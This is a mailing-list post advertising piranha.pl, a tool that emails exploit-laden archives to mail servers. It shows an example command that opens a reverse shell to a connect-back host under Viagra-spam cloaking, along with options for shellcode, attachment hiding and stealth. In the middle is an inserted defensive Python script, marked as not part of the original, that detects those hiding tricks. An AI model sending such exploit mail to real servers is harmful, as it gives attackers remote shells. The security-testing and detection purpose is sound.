HackFest Series: piranha.pl (or why Spamassassin/Clamav is…

Author: Lisa Kachold
Date:  
To: plug-discuss
Subject: HackFest Series: piranha.pl (or why Spamassassin/Clamav is a GOOD IDEA)

Is your mail server secure?

Test it!

Piranha.pl example: Connect back with a reverse shell just by sending an email using "Viagra" cloaking.


$ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a


Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS]

Mandatory arguments:
  -e+           Exploit number to use (See below)
  -h+           SMTP server to test
  -a+           Destination email address used in probing


Optional arguments:
  -s+           Shellcode type to inject into exploits (See below)
  -c+           Cloaking style (See below)
  -d+           Try to vanish attachments from MUA's view (See below)
  -v            Attach EICAR virus to improve stealthness
  -z            Pack all the malware into a tarball to be less noisy
  -p+           Port to use in reverse shell or bind shell
  -l+           Host to connect back in reverse shell mode


Valid exploits numbers:
   0            OSVDB #5753:    LHA get_header File Name Overflow
   1            OSVDB #5754:    LHA get_header Directory Name Overflow
   2            OSVDB #6456:    file readelf.c tryelf() ELF Header Overflow
   3            OSVDB #11695:   unarj Filename Handling Overflow
   4            OSVDB #23460:   ZOO combine File and Dir name overflow
   5            OSVDB #15867:   Convert UUlib uunconc integer overflow
   6            OSVDB #XXX:     ZOO next offset infinite loop DoS


Valid shellcode types:
   0            TCP reverse shell
   1            UDP reverse shell
   2            TCP bind shell


Valid cloaking styles (consult whitepaper for visual result):
   0            No cloaking at all (default)
   1            Viagra spam message
   2            "Look at the pictures I promised you!"


Vanishing techniques for attachments:
   0            No vanishing at all (default)
   1            Multipart/alternative trick
   2            <img src="image.JPG" width=0 height=0> trick




Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis |
http://www.urbandictionary.com/define.php?term=obnosis (503)754-4452
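A defender-side triage check for the two attachment-vanishing techniques listed in the usage text above, plus a flag for attachments in the archive formats that the listed OSVDB entries concern (LHA, ARJ, ZOO, uuencode). This is an added example, not code from the original post or from piranha.pl; the sample message, the extension list and the function names are my own constructions.

```python
import email
import re
from email import policy

# Constructed sample message (not from the original post): an HTML part with a
# zero-size <img>, plus an archive attachment tucked inside a multipart/alternative
# container so a typical MUA never shows it. The base64 body is placeholder bytes.
SAMPLE = b"""From: sender@example.test
Subject: Look at the pictures I promised you!
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="alt"

--alt
Content-Type: text/html

<html><body><img src="image.JPG" width=0 height=0></body></html>
--alt
Content-Type: application/octet-stream; name="pics.lzh"
Content-Disposition: attachment; filename="pics.lzh"
Content-Transfer-Encoding: base64

LWxoNS1BQUFB
--alt--
"""

# Extensions that mail scanners hand to external decompressors (assumed list).
RISKY_EXT = (".lzh", ".lha", ".arj", ".zoo", ".uu", ".uue")
ZERO_IMG = re.compile(r"<img[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)

def triage(raw: bytes) -> list[str]:
    """Walk the MIME tree and return one finding per hidden or risky part."""
    msg = email.message_from_bytes(raw, policy=policy.default)
    findings = []
    def walk(part, path):
        ctype = part.get_content_type()
        if part.is_multipart():
            for i, sub in enumerate(part.iter_parts()):
                walk(sub, path + [f"{ctype}[{i}]"])
            return
        here = "/".join(path + [ctype])
        fname = part.get_filename()
        if fname and any(p.startswith("multipart/alternative") for p in path):
            findings.append(f"attachment {fname!r} hidden under multipart/alternative at {here}")
        if fname and fname.lower().endswith(RISKY_EXT):
            findings.append(f"archive attachment {fname!r} routed to a decompressor at {here}")
        if ctype == "text/html" and ZERO_IMG.search(part.get_content()):
            findings.append(f"zero-size <img> in HTML part at {here}")
    walk(msg, [])
    return findings
```

Run it over a mail spool and each finding names the MIME path, so a quarantine rule or a Spamassassin plugin can act on the exact part rather than the whole message.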




PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss